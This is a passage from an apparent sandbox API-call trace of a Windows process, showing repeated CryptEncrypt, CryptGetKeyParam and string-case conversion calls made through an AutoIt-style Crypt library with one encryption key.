lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.418] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.418] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.418] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.418] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.418] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.418] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.419] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.419] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.419] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.419] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.419] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.419] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.419] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.419] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.419] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.420] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.420] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.420] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.420] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.420] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.420] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.420] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.420] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.421] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.421] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.421] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.421] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.421] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.421] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.422] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.422] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.422] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.422] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.422] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.423] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.423] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.423] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.423] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.423] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.423] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.423] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.424] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.424] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.424] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.424] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.424] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.424] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.424] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.425] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.425] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.435] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.435] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.435] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.436] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.436] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.436] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.436] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.436] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.436] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.437] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.437] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.437] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.437] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.438] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.438] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.438] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.438] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.438] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.438] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.438] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.439] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.439] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.439] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.440] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.440] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.440] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.440] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.440] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.440] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.441] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.441] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.441] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.441] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.441] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.441] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.442] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.442] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.442] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.442] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.442] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, 